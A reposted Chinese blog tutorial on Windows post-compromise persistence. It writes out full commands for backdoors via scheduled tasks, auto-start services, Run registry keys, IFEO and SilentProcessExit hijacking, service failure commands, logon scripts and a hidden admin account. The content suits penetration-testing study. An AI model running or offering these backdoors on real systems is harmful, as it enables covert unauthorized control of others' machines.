Windows权限维持方法

最新推荐文章于 2024-04-30 17:34:48 发布
最新推荐文章于 2024-04-30 17:34:48 发布
阅读量448 收藏
点赞数
分类专栏: 网络安全 文章标签: windows 服务器 网络 安全
原文链接:https://blog.csdn.net/qq_44159028/article/details/124170549
版权

权限维持

Windows权限维持方法

权限维持

在获取服务器权限后,通常会用一些后门技术来维持服务器权限,以防在服务器重启之后丢失shell。权限维持一般在获取了高权限下进行。服务器一旦被植入后门,攻击者便如入无人之境。以下是部分权限维持的技巧,下篇会讲述域环境下的权限维持,主要用到黄金、白银票据

构建计划任务

windows中使用schtasks命令创建计划任务,传送门——> windows计划任务创建—schtasks命令

  1. 创建计划任务"updatex",触发程序为poc.exe,运行级别为高级别,以system权限每隔四个小时运行一次。

schtasks /create /tn “updatex” /tr C:\Users\Administrator\Desktop\poc.exe /rl highest /F /sc hourly /mo 4 /RU system
ps:如果当前为普通用户执行计划任务, /ru参数值可以设置为 %username%,如果是管理员则可以指定为system

注册自启动服务

自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将 exe 文件注册为服务,也可以将 dll 文件注册为服务。

针对服务的操作,涉及到一条命令sc。其可以更改服务的属性、启动状态,删除或停止服务。

  1. 创建服务

#创建名为test的服务(注意等号后面有空格),设置自启动,启动权限为system
sc create test binpath= C:\Users\Administrator\Desktop\poc.exe start= auto obj= Localsystem
#启动服务
net start test
#查询服务
sc query test
#删除服务
sc delete test
服务如下

启动时exe马上运行,过了几秒钟则服务会停止运行,exe也掉线了。因为服务运行的exe如何不符合规范则会停止运行服务。此时我们需要对进程进行迁移,才会不掉线

自启动注册表植入后门

windows提供了专门的开机自启动注册表。在每次开机完成后,计算机会自动遍历自启动注册表下的键值,获取键值中的程序路径,并创建进程启动程序。所以,要想修改注册表实现开机自启动,就需要在这个注册表键值下写入我们想要启动的程序的所在路径。

几个比较常用的实现开机自启动的注册表键值如下,我们可以在这个注册表键下写入要启动的程序路径即可实现开机自启动。ps: 哪个账户设置的注册表就需要用哪个账户登录,才会实现开机自启

#Run键
HKEY_CURRENT_USER\Software\Mircosoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

  1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

添加键test,值为后门程序路径

REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v test /t REG_SZ /d “C:\Users\Administrator\Desktop\poc.exe”

在win2012机器上,成果启动poc.exe。但是在win7上面并没有自启!!

  1. HKEY_CURRENT_USER\Software\Mircosoft\Windows\CurrentVersion\Run

REG ADD “HKEY_CURRENT_USER\Software\Mircosoft\Windows\CurrentVersion\Run” /v test /t REG_SZ /d “C:\Users\Administrator\Desktop\poc.exe”
win7和win2012中都没实现开机自启

映像劫持

“映像劫持”,也被称为 “IFEO”(Image File Execution Options)。通过修改“Debugger“项值,替换执行程序,加以利用。映像劫持其实是Windows内设的用来调试程序的功能,但是现在却往往被病毒恶意利用。当用户双击对应的程序后,操作系统就会给外壳程序(例如“explorer.exe”)发布相应的指令,其中包含有执行程序的路径和文件名,然后由外壳程序来执行该程序。事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序

作用:劫持对应的程序后,打开该程序运行的是别的程序,比如运行A.exe打开的则是CALC.exe

其注册表路径为:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

  1. 在注册表路径下创建一个项,项名为要劫持的exe名称,可以为任意一个可以运行的exe程序,包括安装后和未安装的exe。并在该项创建一个Debugger的键值(名字只能为Debugger),键值填运行的恶意exe。

对notepad++程序进行劫持

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe” /v Debugger /t REG_SZ /d “C:\Users\Administrator\Desktop\poc.exe”
此时打开notepad++,则相当于双击了poc.exe。notepad++则不会打开

映像劫持新玩法:

上所讲述,通过修改IFEO中的“debugger”键值,用来替换原有程序的执行。而新的利用方法,实现的效果是:程序A静默退出结束后,会执行程序B。

效果:程序A静默退出结束后,会执行程序B。

劫持notepad.exe示例:

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe” /v GlobalFlag /t REG_DWORD /d 512
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe” /v ReportingMode /t REG_DWORD /d 1
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe” /v MonitorProcess /t REG_SZ /d “C:\Windows\System32\calc.exe”
此时我们打开notepad再关闭后就会弹出计算器

简单解释一下ReportingMode和MonitorProcess 这两个项值的作用。MonitorProcess的值表示监视器进程。Reporting Mode可以设置为三个值 。

Flag Value 解释
LAUNCH_MONITORPROCESS 0x1 检测到进程静默退出时,将会启动监视器进程(在GFLAGS.exe中,Silent Process Exit这个选项卡所填写的值,即MonitorProcess的项值)
LOCAL_DUMP 0x2 检测到进程静默退出时,将会为受监视的进程创建转储文件
NOTIFICATION 0x4 检查到进程静默退出时,将会弹出一个通知
参考:Image File Execution Options新玩法

失败命令
Windows提供了一种功能,以便在服务无法启动或其通信过程终止时执行某些操作。具体来说,当服务被终止时,接着会执行一个命令。相当于上面关闭了notepad时又调用了一个程序一样。控制此操作的注册表项是“ FailureCommand ”,其值将定义要执行的操作。

我们将命令设置为执行poc.exe

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time” /v FailureCommand /t REG_SZ /d “C:\Users\Administrator\Desktop\poc.exe”
上述命令将使用一个恶意可执行文件修改注册表项,该可执行文件将在其进程被杀死后运行。

这里我的poc.exe没有启动成功。可参考:权限维持篇-利用现有服务维权—失败命令

logon scripts 后门
Windows 登录脚本,当用户登录时触发,Logon Scripts 能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。

注册表位置:HKEY_CURRENT_USER\Environment

REG ADD “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “C:\Users\Administrator\Desktop\poc.exe”
用户一登录成功执行poc.exe

创建隐藏账号

当主机开放了3389端口,我们可以创建隐藏账号

  1. 使用如下命令创建隐藏用户并加入管理员组

net user hacker$ 123456 /add
net localgroup administrators hacker$ /add
创建成功后使用 net user 命令无法查看到此用户

但是 net localgroup administrators 可以查看到

虽然net user看不到隐蔽账号,但是计算机管理页面中还是可以看到,需要通过修改注册表来隐藏。

我们可以通过对注册表的修改来将其完全隐藏 ——> Windows创建克隆隐藏账号
————————————————
版权声明:本文为CSDN博主「山山而川’」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_44159028/article/details/124170549

@Mrs.z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透之windows权限维持
07-18
windows进程查看器(dll)
Window权限维持(二):计划任务
11-05 966
Windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够在特定的日期和时间执行程序或脚本。这种行为可作为一种持久性机制被red team利用。通过计划任务执行持久性不需要管理员权限,但如果已获得提升的权限,则允许进一步操作,例如在用户登录期间或在空闲状态期间执行任务。 计划任务的持久化技术可以手动实现,也可以自动实现。有效负载可以从磁盘或远程位置执行,它们...
Windows10/linux权限维持
m0_74891800的博客
02-06 816
1选项表示使用MD5加密算法,-salt 'salt'为密码添加一个盐值(一个随机字符串),123456是你要设置的明文密码。这个命令将返回加密后的密码。然后在在文件里面创建一个建建名 随便填写 我这里使用的是Debugger 然后在下面添加他的值他的值为你想要执行的文件的绝对路径,就例如;1,/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名。d /home/test: 这个选项设置新用户的家目录为/home/test。
权限维持简单总结
Aiwin的博客
08-17 3816
权限维持简单总结
GFlags 检查内存越界、野指针等作用的工具使用
05-10 1301
转载于:http://blog.csdn.net/zhufangyou/article/details/6563878   打开检查功能: gflags /p /enable  **.exe /full 关闭检查功能: gflags /p /disable  **.exe 列出当前启动了页堆的进程列表 : gflags /p 1. 案例 调试运行,程序退出时崩溃在
权限维持(什么是后门?如何留后门?)-Windows篇 (゚益゚メ) 渗透测试
寻觅的博客
09-12 2055
来看看如何做开机自启!我们渗透一定要持久!
【内网安全】——Windows权限维持
Demo不是emo的博客
02-19 2785
Windows权限维持姿势汇总
网络安全权限维持(持续更新)
qq_52074678的博客
05-22 1736
权限维持 我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制目标。 渗透流程 Windows权限维持 1.用户维持 隐藏用户维持(影子用户) 隐藏账户,顾名思义就是计算机看不到的用户(不是不存在用户只是用一般的查看方式看不到) $符号隐藏用户 $符号隐藏用户就是在一个用户名后面加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持 1.我们平时查看一个操作系统的几个用户的命令如下 net user.
gflags disable无效?看这里
newmandirl的专栏
01-24 411
打开你的注册表 找到这个: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 可以直接删除你想取消的exe文件 done
windows权限维持方法详解
yy
01-23 3379
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。 权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。
渗透之权限维持的13种方法
include_voidmain的博客
08-04 1065
渗透之权限维持的13种方法
Telemetry:WINDOWS TELEMETRY权限维持
03-18
今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / ...
权限维持_Windows内核_驱动断链隐藏技术1
08-03
1. 恶意驱动件查找 2. 驱动断链隐藏结构 3. 代码分析实现
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
046-红队之浅谈基于Windows telemetry的权限维持.pdf
09-20
046-红队之浅谈基于Windows telemetry的权限维持.pdf
java技术栈快速复习04_javaweb基础总结
最新发布
咖啡味的小认真
04-30 750
JDBC(Java DataBase Connectivity,Java数据库连接)是一种用于执行SQL语句的Java API,可以为多种关系数据库提供统一访问。简单说就是用Java语言来操作数据库。jdbc原理早期SUN公司的天才们想编写一套可以连接天下所有数据库的API,但是当他们刚刚开始时就发现这是不可完成的任务,因为各个厂商的数据库服务器差异太大了。
flutter 生成单选组件
weixin_40466351的博客
04-30 503
【代码】flutter 生成单选组件。
字符串分割成List的几种方式
GSIBin
04-28 524
在Java开发中,我们经常需要将字符串转换为List类型,以便进行后续处理。下面介绍几种常见的字符串转List的方式,并给出相应的使用教程。
【无标题】
qq_25699299的博客
04-29 289
变量 A 和 B,分别包含了一些整数。最后,我们遍历新的合并列表并打印出其中的元素。方法将两个列表合并成一个新的列表,并通过。合并的结果是1,2,3,4,5,6.在这个示例中,我们首先创建了两个。,并对新的列表进行进一步操作。通过这种方式,您可以将两个。
Windows 常见的权限维持方式
05-21
以下是 Windows 常见的权限维持方式: 1. 提权攻击:攻击者通过利用系统或应用程序的漏洞,获取更高的权限。 2. 横向渗透:攻击者通过已经获得的用户帐户,尝试在网络内部扩散并获取更高的权限。 3. 后门:攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值